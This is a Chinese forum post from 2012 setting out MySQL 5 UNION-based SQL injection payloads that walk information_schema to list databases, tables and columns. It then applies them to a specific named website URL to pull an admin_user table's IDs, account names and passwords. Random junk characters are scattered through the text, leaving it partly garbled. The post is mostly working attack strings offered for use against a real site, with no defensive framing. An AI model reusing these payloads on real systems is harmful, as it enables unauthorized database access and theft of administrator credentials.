查库
7 }9 p; }( p) i! i" | v1 F9 {! r$ _& [: i+ i7 E5 ?# l1 j
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*) X% r7 h+ E+ \# S$ N
?7 I% s& C9 I7 l' ~
查表
7 t3 N1 X" L) p# C! r
/ a+ ^" s0 i8 A. u0 F( j/ Hid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
, g' \/ k5 x2 x$ f
, h* m/ z4 E0 M查段, G, F3 O5 G, n1 c7 k
8 M0 ^+ w6 y- G2 Qid=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,17 E# u/ e5 J( V; s- m- W
: Z9 Q0 L6 t2 }6 T- s/ X0 q
" G& J, f1 J3 ]" m R( F. g: H. Pmysql5高级注入方法暴表( W- s4 S, P5 Y4 _
7 ^& C* Q! u1 j1 I0 X
例子如下:9 s7 N8 K0 [0 k# |& }4 E
4 f- q% s/ c' T: v S: e& X
1.爆表7 z3 N' R$ ^7 b! U9 x1 F
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
: q' q5 u! d% T6 b这样爆到第4个时出现了admin_user表。
* B a5 N+ x8 n. i P6 |6 ^. x2 f; n* S' n& d. k
2.暴字段- ~& M8 E6 W, E4 Q; W: R* w
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*6 O1 k" N# }% f1 G: p
1 o* O( R& k. J3 y
% B; N5 c$ f4 ]3 A! e8 R! v3.爆密码/ J2 F# \/ }& E F0 q& I* d
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
+ O3 @/ W& l: Q
; }- R. _- O0 u5 S `$ i9 ^
. ?( w! c. u1 S# { |
发表于 2012-9-13 16:29:37
收藏
支持
反对